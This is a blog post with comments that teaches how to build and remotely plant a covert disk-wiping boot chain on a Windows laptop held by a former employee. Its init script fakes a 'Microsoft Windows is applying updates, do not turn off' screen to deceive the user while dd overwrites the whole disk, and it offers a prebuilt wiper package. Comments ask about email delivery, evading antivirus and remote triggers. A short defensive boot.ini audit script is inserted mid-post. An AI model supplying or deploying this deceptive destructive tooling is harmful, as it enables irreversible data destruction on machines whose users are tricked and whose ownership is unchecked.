Remote wipe for Windows clients

I recently had a situation where an employee was fired and then refused to return 'his' laptop to the company. I cannot break into his home to retrieve the hardware. But at least I can make sure the software volume licences are really removed from the hardware. I did this with my own, self-built remote wipe function.

How do you remotely wipe a Windows client that you own? WARNING: DO NOT use this method on other people's computers! Never commit vandalism; use this only to protect your data from thieves.

Prebuilt software

Below is a manual on creating software to wipe a system. You may also download my prebuilt software. Unzipping it into the c:\ of your computer will wipe the hard disk.

Social solution for technical limitations

The boot sector of a hard drive is overwritten in a jiffy, but it can easily be restored with special tools. If you overwrite the whole hard disk, the data cannot be restored, but overwriting takes a lot of time.
If you tell the thief "hey, I'm now overwriting the hard disk", he'll probably switch it off. So we need to scare the thief into not turning off the computer. I did this by printing the text "Microsoft update being installed" and saying that the user should absolutely not switch off the computer.

Requirements

To build the software for a remote wipe, you need:

  • Administrator access to the stolen laptop
  • A virtual machine (like VMware) to test it. An identical laptop would be even better, because it has exactly the same drivers.

Step 1. Build grub bootloader

You can build your own bootloader or use my grldr. Compiling on my x86_64 system didn't work; use a 32-bit system (or fix the libs yourself)!

mkdir /tmp/bootloader
cd /tmp/bootloader
wget http://download.gna.org/grub4dos/grub4dos-0.4.4-src.zip
unzip grub4dos-0.4.4-src.zip
cd grub4dos-0.4.4
chmod +x configure build
vim stage2/boot.c
# edit lines 298 and 960 to change the messages grub prints at boot; I used them to scare the laptop thief into not switching off the computer
make

In grub4dos-temp/grub4dos-0.4.4/ you'll find a file named grldr. This is the grub bootloader. Copy it to c:\ of the computer you want to wipe.

Step 2. Get yourself a linux kernel

I simply used the running CentOS kernel of my development machine, /boot/vmlinuz-2.6.18-194.26.1.el5. I renamed this file to bzImage and copied it to c:\ of the "victim".

Step 3. Make an initrd

With a regular Linux installation, all files are placed on a Linux (ext2, ext3, ext4, xfs or btrfs) partition. Unfortunately, we don't have such a partition. That's why we put all tools in an initrd (initial ramdisk). We may need SATA drivers, so as a base we use the initrd associated with the kernel we use, /boot/initrd-2.6.18-194.26.1.el5.img.

mkdir /tmp/initrd
cd /tmp/initrd
# run this as root: the archive contains device nodes that cpio cannot create as a regular user
gzip -dc /boot/initrd-2.6.18-194.26.1.el5.img | cpio -id
cd bin
# Download a statically linked "dd" executable (or build it yourself)
wget https://www.geeklab.info/wp-content/uploads/2010/12/dd.zip
unzip dd.zip && rm dd.zip
cd ..

Now edit the file "init" so that it loads all required drivers, creates the /dev nodes and finally wipes the system. My init file contains:

#!/bin/nash
echo
echo
# here I have 40 more echos, acting as a "tput clear" without having the tput command
echo
echo
echo "Microsoft(TM) Windows(TM) is applying updates."
echo
echo
echo "Running pre-update checks:"
echo "- Windows kernel: OK"
echo "- Drivers: OK"
sleep 1
echo "- Diskspace: OK"
echo "- Disk fragmentation: Defragmentation required to continue"
sleep 1
echo " Defragmenting harddisk. This may take a while. Please wait..."
echo " WARNING: Do not turn off your computer to prevent damage"
echo ""
mount -t proc /proc /proc
mount -t sysfs /sys /sys
mount -o mode=0755 -t tmpfs /dev /dev
mkdir /dev/pts
mount -t devpts -o gid=5,mode=620 /dev/pts /dev/pts
mkdir /dev/shm
mkdir /dev/mapper
mknod /dev/null c 1 3
mknod /dev/zero c 1 5
mknod /dev/urandom c 1 9
mknod /dev/systty c 4 0
mknod /dev/tty c 5 0
mknod /dev/console c 5 1
mknod /dev/ptmx c 5 2
mknod /dev/rtc c 10 135
mknod /dev/tty0 c 4 0
mknod /dev/tty1 c 4 1
hotplug
mkblkdevs
insmod /lib/scsi_mod.ko
insmod /lib/libata.ko
#insmod /lib/sata_via.ko   (or whichever other (S)ATA driver the chipset needs)
mkblkdevs
# wipe the whole disk: the device is sda or hda depending on the controller driver
dd if=/dev/zero of=/dev/?da

Warning: you may need drivers to access the hard disk, for instance ahci.ko. Check the "victim's" chipset and load the correct drivers.
Finally, merge the files into one initrd file:

find ./ | cpio -H newc -o | gzip > /tmp/initrd.gz

and copy it to c:\ of the "victim".

Step 4: menu.lst

Create a file named menu.lst and place it in c:\:

default 0
timeout 0
title Installing update
kernel (hd0,0)/bzImage quiet
initrd (hd0,0)/initrd.gz

Step 5: boot.ini

The hidden system file c:\boot.ini contains the configuration for ntldr, the boot loader Windows uses. Remove the system and hidden attributes, then edit boot.ini to contain the following:

[boot loader]
timeout=0
default=c:\grldr
[operating systems]
c:\grldr="MSWIN Updater service"
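
Step 5 is the point where ntldr hands control to a non-Windows loader, and from the defending side it is the easiest place to spot this technique. As an added example (not from the original post), the Python below parses a boot.ini and flags entries whose target is a file rather than an ARC path, treating a default that points at such a file with timeout=0 as the telling combination; both samples are constructed here, one copied from the boot.ini above and one a stock Windows XP layout.

```python
import re

# ntldr boots Windows from ARC paths (multi(0)disk(0)rdisk(0)partition(1)\WINDOWS); any other target is a file it chainloads, as c:\grldr is here.
ARC_PATH = re.compile(r"^(multi|scsi|signature)\(", re.IGNORECASE)


def parse_boot_ini(text):
    """Minimal boot.ini parser: {section (lowercased): {key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


def audit_boot_ini(text):
    """Return findings for entries that hand control to a non-Windows loader."""
    cfg = parse_boot_ini(text)
    loader, systems = cfg.get("boot loader", {}), cfg.get("operating systems", {})
    default, timeout = loader.get("default", ""), loader.get("timeout", "")
    findings = []
    for target, value in systems.items():
        if not ARC_PATH.match(target):
            label = value.split('"')[1] if '"' in value else value
            findings.append("chainload entry %s labelled '%s'" % (target, label))
    if default and not ARC_PATH.match(default):
        findings.append("default boots the chainload target %s" % default)
        if timeout == "0":
            findings.append("timeout=0: the foreign loader runs with no menu shown")
    return findings


# Constructed samples: the boot.ini from the article versus a stock Windows XP one.
REDIRECTED = """[boot loader]
timeout=0
default=c:\\grldr
[operating systems]
c:\\grldr="MSWIN Updater service"
"""
STOCK = """[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS="Microsoft Windows XP Professional" /fastdetect
"""
```

A legitimate Recovery Console entry (C:\CMDCONS\BOOTSECT.DAT) is also a chainload and will show up as a finding; the default-plus-timeout=0 pair is what distinguishes an unattended redirect like the one above.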

Step 6: Check

The c:\ of the "victim" now contains:
c:\grldr
c:\menu.lst
c:\bzImage
c:\initrd.gz
c:\boot.ini
Check that all files exist.

Step 7: Reboot

With psshutdown (part of Microsoft's PsTools) reboot the "victim": psshutdown \\computer -r -t 0. Don't wait for the "victim" to reboot his computer himself; he may not reboot it but suspend it instead.

© GeekLabInfo Remote wipe for Windows clients is a post from GeekLab.info. You are free to copy materials from GeekLab.info, but you are required to link back to http://www.geeklab.info


21 comments on “Remote wipe for Windows clients”

  1. Hmmm, overly complicated, obfuscated scripting that is intended to deceive the user/victim... No thanks.

  2. @the guy that has no name:
    1. Please get yourself a name, it makes social contact a lot easier! ;-)

    2. Yes, it's complicated, but if the other option is to leave thousands of dollars worth of data in the hands of a thief, I think it's the best option. And the word 'geek' in the name of my site means we like complicated stuff.

    3. I hadn't documented the reason why you have to deceive the thief very well. I wrote a block on it now. Unfortunately, it's required to buy yourself time to overwrite a significant part of the harddisk.

  3. Connecting to the Internet costs me money.
    Please disable your ads or find a way to pay for my bandwidth.

  4. @Anonymous:
    Sorry that my ad-blocker-blocker was annoying to you. But if you want to use my knowledge and research, you must view my ads. That's you paying for MY bandwidth you've used to visit my site.

    If you don't like that, please contact me. I'll be glad to remove the ads if you pay me the real value of the information I'm now giving you for free.

  5. Does this work with Win7? I tried your prebuilt software on my virtual Win7 32-bit; at boot up Windows Boot Manager gives the option 1) Windows 7 OR 2) MSWIN updater service.
    Choosing option 2 returns the error "windows failed to start etc.....file\grldr"; the hard drive is not wiped, and the system can be rebooted.

    Is there a way of having the hdd delete sequence start up automatically after rebooting win 7 ?

  6. Yes, this should work on Win7 as well. Actually, it doesn't use any windows files except for the boot loader. If you can tell the bootloader to start grldr, you're all set.

    The error you mentioned means that probably the grldr file is placed in the wrong directory, it must be in c:\.

    Also make sure that your initrd has the right kernel modules loaded to be able to access the harddrive. (But that's step 2, you're stuck at step 1 now.)

  7. Here is what I did. I downloaded remotewipe.zip to desktop. Extracted the files, then copied all files to C:\ using win explorer.

    WIN7 - I try to reboot but I get the above message in Win 7.

    WINXP - I retried on a win xp image; this time I got the "windows applying updates etc " message, then "memory crash kernel, 0x0 0x0, not within permissible range" then "kernel panic - not syncing: Attempted to kill init!" The information on the drive was still intact.

    Am I placing the files in the wrong directory ?

  8. Hi Maz,

    http://wiki.centos.org/Manuals/ReleaseNotes/CentOS5.1 says:
    During the boot process you may see the message "Memory for crash kernel (0x0 to 0x0) not within permissible range" appear. This message comes from the new kdump infrastructure. It is a harmless message and can be safely ignored.

    The other error IS fatal however. Sounds like it cannot start init for some reason. Are there any other warnings or errors?

    My build is a specific build for my computer. It could run on ANY operating system that is installed on my computer. But if you have different hardware, you may need to include kernel modules for that specific hardware.

    Btw, what is your situation? Are you just trying for fun, or do you really need the fix? It sounds like you still have physical access to the machine you're trying to wipe?

  9. I will try again. Although I am sure the files are in C:\

    Is there an alternate way of wiping a laptop. I have an employee that is being difficult in returning our company laptop, fortunately I have "logmein" installed and active on the laptop. As I don't have the luxury of logging in for extended periods I would like a quick 5 minute procedure that would enable me to wipe the data.

    All help is appreciated....Thanks

  10. Kind of the same situation I had.

    I got in because the laptop connected to the office vpn automatically. Then I could use explorer to upload the files. To make this software work, you'll need to have quite some linux experience in order to use the right drivers.

    You COULD erase some boot files. For instance removing boot.ini means it won't boot. However, a computer repair shop could easily fix that. I wanted to make sure he couldn't get it fixed.

    What's the brand and type of the laptop?

  11. It's a Dell Inspiron 1520.

    I was considering LoJack, but of course that would require more than 5 mins to setup.

  12. AFAIK, LoJack is to recover stolen property, not to perform a remote wipe.

    The Dell Inspiron 1520 has an Intel Matrix Storage Manager A01 chipset. I can't find which kernel module is required for this. Hmm, maybe I should add all sorts of drivers to my own image, so it works on almost every computer...

    Maybe I'll do this next week...

  13. Does your prebuilt software work on Windows XP & Windows Vista?
    If the user has partitioned the drive into C, D, E, F... will it wipe all data on all drives?
    Does this software get detected as a virus when scanned by an antivirus program?
    Can I send the software as an email attachment, and the user downloads it and unzips it to do the wipe function?
    Will all data be erased completely so that it cannot be recovered using any data recovery software?
    Please advise... your advice will be very much appreciated.

  14. Does your prebuilt software work on Windows XP & Windows Vista?

    Yes. It works on any operating system, as long as the IDE/SATA drivers are supported.

    If the user has partitioned the drive into C, D, E, F... will it wipe all data on all drives?

    Yes, it wipes the whole harddrive, not the partition.

    Does this software get detected as a virus when scanned by an antivirus program?

    No, it's a regular Linux distribution that fires a program to kill the harddrive data. It isn't a virus.

    Can I send the software as an email attachment, and the user downloads it and unzips it to do the wipe function?

    No, you need to install it on the harddrive yourself. Thus, you'll need to have full remote administrator access.

    Will all data be erased completely so that it cannot be recovered using any data recovery software?

    The software overwrites the whole disk with zeroes. Forensic detectives may be able to recover data from the overwritten disk, but regular thieves don't. However, there is one problem: overwriting the whole disk takes a lot of time. If the user feels something is wrong, and powers down the system, not everything may be overwritten yet.

    In my case, I had full administrator access, knew exactly what hardware it was and had a user that was as stupid as a mule. Making him think the system was actually being updated wasn't that hard.

  15. I've tried your prebuilt software. It's not working. Got error "grldr not fould" but all the files are in place:
    c:\grldr
    c:\menu.lst
    c:\bzImage
    c:\initrd.gz
    c:\boot.ini

  16. Grldr is the grub boot loader.

    There could be several reasons for this error. The most common reasons are related to LBA, the addressing of the hard disk. The BIOS can only address the first part of the hard disk. Only after loading the operating system with its (S)ATA drivers can every part of every disk be accessed.

    In my case, the disk of the stolen computer was small. In your case, the disk may not be that small, and the grldr file may be in an unaddressable block.

    If you want to use this technique to wipe a stolen laptop, I really wouldn't know what to do. But if you still do have control over the computer, you could try to update the BIOS to get newer LBA support. Another option is to use MyDefrag to move the file to the beginning of the disk. The latter solution has the risk that at some point in time it is undone.

    This forum post is pretty useful.

  17. I'm in the same situation with hardware not being returned. I'm trying to run this on a server running 2008RC2

    I believe I have the modules loaded correctly, and I've manipulated the BCD to where it will boot grub, but now I get "error 15 file not found."

    I'm not sure if I repacked the initrd correctly. When I ran cpio -id initrd.cpio I received a few "Cannot mknod: Operation not permitted"

    Here are my steps to repack it:

    find ./ | cpio -H newc -o > initrd.cpio
    gzip initrd.cpio
    mv initrd.cpio.gz initrd.gz

    Any ideas?

  18. Running cpio -id extracts files from initrd - some of these files are special files (character/block devices) that cannot be created as regular user.

    Run sudo -s or su - to become root first.

  19. Interesting article!
    I haven't tried this solution yet, but I want to do this.
    It would be good if you could update this awesome article to meet these days' operating systems,
    I mean not just XP, Vista or 7 but 8, 8.1 and also 10.
    And yes, making it work cross-hardware is even better.
    I would appreciate it.
    I wish we could write some script to not only run it automatically on the victim's system
    but to create some sort of socket listener service on the net, ready to receive a self-destruct trigger from the admin.
    It's a very necessary secret weapon for us IT men.
    Thanks for all your hard work, and I appreciate you sharing good stuff with us.
    Sincerely

  20. David, you are really smart; I know you can help me with a problem I am having. I have a Toshiba Satellite C875D, AMD A4-4300M 2.5GHz with ATI Radeon HD 7420G, running Windows 8 (x64) build 9200. OK, so my mother had this laptop and then the screen got stepped on. I was able to remove the damaged LED display and put the upper housing all back together as a joke (I'm going to paint a wicked loading sign in the void lol), so the laptop has HDMI output, which is what it will primarily be used for: Netflix, some research, maybe a little Windows 10 reviewing and so forth. Hey, I'm doing the best I can with a freebie crushed laptop lol. OK, to the point. I cannot find a way whatsoever to upgrade, downgrade, wipe, install, or virtually do anything outside of the current OS, because the UEFI display does not, WILL not, support the use of the HDMI cable. And as I'm limited by TVs and monitors and whatnot, I need help. My desktop doesn't have this problem. Same cord, same TV, same OS shows the display all the time. So if you could help me fix the display issue, which is any time whatsoever that the Windows OS isn't fully booted, or tell me how to nuke this hard drive remotely from my desktop via Ethernet or home network or anything, something please lol. I'm savvy enough, just not versed enough.
